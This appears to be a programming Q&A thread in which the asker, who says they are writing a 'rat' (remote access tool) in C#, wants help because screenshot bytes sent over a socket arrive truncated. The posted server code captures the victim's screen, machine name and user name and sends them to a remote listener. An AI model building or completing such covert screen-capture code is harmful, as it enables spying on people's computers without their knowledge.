# C# : MemoryStream problems in sending and receiving image bytes

Tags: c#

I have a problem with memory-stream
I'm making a rat program and trying to send an image but when I save it's bytes to a memory-stream using png format then send it. I just receive a small part of it and when I use bmp it gives me an error (Parameter is not valid) and when I use jpeg sometimes I receive the image missing some parts so please can anyone help me?

Server Send Code : ( this code should send PC name and an image )

```
string PC = Environment.MachineName + "/" + Environment.UserName+ count;
int Width = Screen.PrimaryScreen.Bounds.Width;
int Height = Screen.PrimaryScreen.Bounds.Height;
Bitmap ScreenShot = new Bitmap(Width, Height);
Graphics ScreenShotGraphics = Graphics.FromImage(ScreenShot);
ScreenShotGraphics.CopyFromScreen(0, 0, 0, 0, new Size(Width, Height), CopyPixelOperation.SourceCopy);
MemoryStream MemoryStream = new MemoryStream();
ScreenShot.Save(MemoryStream, System.Drawing.Imaging.ImageFormat.Bmp);
byte[] ScreenShotToByte = MemoryStream.ToArray();
byte[] Image = ScreenShotToByte;
MemoryStream CollectMemoryStream = new MemoryStream();
CollectMemoryStream.Write(StringToByteArray("1"), 0, 1);
CollectMemoryStream.Write(StringToByteArray(SplitChar), 0, SplitChar.Length);
CollectMemoryStream.Write(StringToByteArray(PC), 0, PC.Length);
CollectMemoryStream.Write(StringToByteArray(SplitChar), 0,  SplitChar.Length);
CollectMemoryStream.Write(Image, 0, Image.Length);
Client.Client.Send(CollectMemoryStream.ToArray(), 0,   CollectMemoryStream.ToArray().Length, SocketFlags.None);
```

Client receive Code : ( this Code should receive the PC name and the image )

> SplitText is a string[] holds the order and the PC name and the image converted to string from byte[] and got split

```
string PCName = SplitText[1];
this.Invoke((Action)(() => { int NewClientNumber = listBox1.Items.Add(PCName); }));
MemoryStream GetThumpBytes = new MemoryStream();
GetThumpBytes.Write(ByteArray, SplitText[0].Length + SplitChar.Length + SplitText[1].Length + SplitChar.Length, ByteArray.Length-(SplitText[0].Length + SplitChar.Length + SplitText[1].Length + SplitChar.Length));
byte[] ThumpBytes = GetThumpBytes.ToArray();
MemoryStream MemoryStream = new MemoryStream();
MemoryStream.Write(ThumpBytes, 0, ThumpBytes.Length);
Image Thumb = Image.FromStream(MemoryStream);
pictureBox1.Image = Thumb;
```

Png Try Image :
[image]

Jpeg Try Image :
[image]

Bmp Try Image :
[image]

Comment: Lol.  I can assure you that there is no difference between an "image byte" and a byte.  There are only bytes.  Image format makes no difference to a memory stream.

Comment: It hurt my eyes trying to read that code, I couldn't go through with it. Learn the very basics first, before you jump onto writing rat tools. One "basic" is what are variable names for. Consider this going like this: `var imageStream = new MemoryStream()`

Comment: I agree with Sten Pertov. variable names should not start capitalised.

Comment: why xD do i must start my var name with a small char ?

Comment: and btw i know that there is no difference between an "image byte" and a byte xD i think it's just length problem

Comment: but why i have that gray color at the jpeg try

Comment: Variables start with a small letter by convention.  The compiler doesn't care.  Programmers to include SO posters often do.

Answer (score 0):

One issue I see is that assigning the image is most likely on the wrong thread.

```
this.Invoke(() => pictureBox1.Image = Thumb);
```